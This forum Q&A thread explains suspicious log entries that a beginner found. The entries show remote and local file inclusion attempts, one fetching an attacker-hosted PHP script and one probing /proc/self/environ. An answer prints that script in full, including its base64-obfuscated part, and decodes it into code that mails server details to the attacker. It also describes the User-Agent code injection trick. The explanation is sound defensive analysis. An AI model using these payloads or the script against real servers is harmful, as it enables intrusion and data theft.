Beginners security question

I'm still pretty new to web development, and have a question about security.

Every day I look at the "Latest Visitors" in my CPanel, and today there were some strange entries (one is pasted below).

Not knowing any better, it looks to me like there is some site that's referring users to my site, for some reason. Can someone explain what these really are, and if it's something to be concerned about? Thanks!

Host: 77.68.38.175

/?p=http://teen-37.net/myid.jpg?
    Http Code: 404  Date: Feb 17 08:13:58   Http Version: HTTP/1.1  Size in Bytes: -
    Referer: -
    Agent: libwww-perl/5.805   *  

/?p=../../../../../../../../../../../../../../../proc/self/environ%00
    Http Code: 404  Date: Feb 17 08:13:59   Http Version: HTTP/1.1  Size in Bytes: -
    Referer: -
    Agent: libwww-perl/5.805

Short answer:

Someone is attacking you.

Long answer:

Someone is using Perl scripts with the LWP module to act like a web browser and request strange URLs from your server to make it do something dangerous. This can be an automated attack or someone is doing it manually.

The second entry is trying to make your server include ../../../../../../../../../../../../../../../proc/self/environ in the website which means go to the parent directory a lot of times (so probably end in the root directory) and show /proc/self/environ which in Linux shows the environment variables of your process which can give some useful information to the attacker. UPDATE: It is not only getting information but also probing for local file inclusion vulnerability where you can run arbitrary code by putting PHP code in User-Agent HTTP Header and then including /proc/self/environ in the page. (Thanks to aaz for pointing it out.)

The first entry is even more interesting because it is apparently trying to make your server download attacker's code and make your server run it. This is what I just got when I downloaded http://teen-37.net/myid.jpg - it's not a JPEG image but a PHP script:

<?
$win = strtolower(substr(PHP_OS,0,3)) == "win";
echo "B"."a"."M"."b"."Y"."<br>";
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
 $safemode = true;
 $hsafemode = "4ON6";
}
else {$safemode = false; $hsafemode = "3OFF6";}
$xos = wordwrap(php_uname(),90,"<br>",1);
$xpwd = @getcwd();
$OS = "[SAFEMOD:".$hsafemode."] [Kernel:".$xos."]";
echo "<center><A class=ria href=\"http://".$OS."\">";echo "B"."a"."M"."b"."Y</A></center><br>";
echo "<br>OSTYPE:$OS<br>";
echo "<br>Pwd:$xpwd<br>";
eval(base64_decode("JGNyZWF0b3IgPSBiYXNlNjRfZGVjb2RlKCJiWGxwWkhOallXNUFaMjFoYVd3dVkyOXQiKTsKKCRzYWZlX21vZGUpPygkc2FmZW1vZGU9Ik9OIik6KCRzYWZlbW9kZT0iT0ZGIik7CiRiYXNlPSJodHRwOi8vIi4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107IAokbmFtZSA9IHBocF91bmFtZSgpOwokaXAgPSBnZXRlbnYoIlJFTU9URV9BRERSIik7CiRob3N0ID0gZ2V0aG9zdGJ5YWRkcigkX1NFUlZFUltSRU1PVEVfQUREUl0pOwokc3ViaiA9ICRfU0VSVkVSWydIVFRQX0hPU1QnXTsgCiRtc2cgPSAiXG5CQVNFOiAkYmFzZVxudW5hbWUgLWE6ICRuYW1lXG5JUDogJGlwXG5Ib3N0OiAkaG9zdFxuJHB3ZHNcbiI7CiRmcm9tID0iRnJvbTogTU9ERV89Ii4kc2FmZW1vZGUuIjx0b29sQCIuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiI+IjsKbWFpbCggJGNyZWF0b3IsICRzdWJqLCAkbXNnLCAkZnJvbSk7"));
die("<center> ByroeNet </center>");
?>

The last part - eval(base64_decode("...")); - is clearly trying to hide what it's doing but you can decode it and you get this:

$creator = base64_decode("bXlpZHNjYW5AZ21haWwuY29t");
($safe_mode)?($safemode="ON"):($safemode="OFF");
$base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; 
$name = php_uname();
$ip = getenv("REMOTE_ADDR");
$host = gethostbyaddr($_SERVER[REMOTE_ADDR]);
$subj = $_SERVER['HTTP_HOST']; 
$msg = "\nBASE: $base\nuname -a: $name\nIP: $ip\nHost: $host\n$pwds\n";
$from ="From: MODE_=".$safemode."<tool@".$_SERVER['HTTP_HOST'].">";
mail( $creator, $subj, $msg, $from);

And now when you decode "bXlpZHNjYW5AZ21haWwuY29t" you get the email address.

We now know what someone was trying to make your server do - send email with some info about your server.

You now have the IP of your attacking server which may or may not know that it is attacking - 77.68.38.175 seems to be server77-68-38-175.live-servers.net - and the email of the attacker which must be used to collect data once in a while, and also the domain hosting malicious code.

Search whois databases for the teen-37.net (which is hosting malicious code), the 77.68.38.175 IP address (which is attacking your server) and the 123.30.181.39 IP address (IP of teen-37.net) for contact info to people responsible for reporting abuse.

Also googling for teen-37.net and for some random parts of the malicious script might give you more interesting info.

Now, from the 404 response code we may assume that those two particular attacks didn't work but you can't be sure, because theoretically when the attacker is controlling your server he can respond to himself with 404 after doing what he wanted to do.

Good luck.


In the first example someone is trying to include his own content in your site. Which could be done if your $_GET['p'] did a naive include() or file_get_contents() call. Same goes for the second example, although that one is to retrieve information about the systems environment.


Nope. The "referer" field in both of your sample log entries is empty. In this case, either the user went straight to the site, or their browser simply did not provide the referer header that yields this information.

In this case the browser or "user-agent" involved is a libwww-perl, so it seems that some tool written in perl is making the requests.

From the second URL it looks like an attempt at a hack on your web server. This is very common on the internet, and as long as your webserver is up-to-date you should not have any problems.


Looks like it's "someone" (probably just a script) probing for vulnerabilities. The first one looks like it's testing to see if it can get your site to perform arbitrary redirects or display arbitrary data and the second is trying to get your site to display arbitrary files on the file system.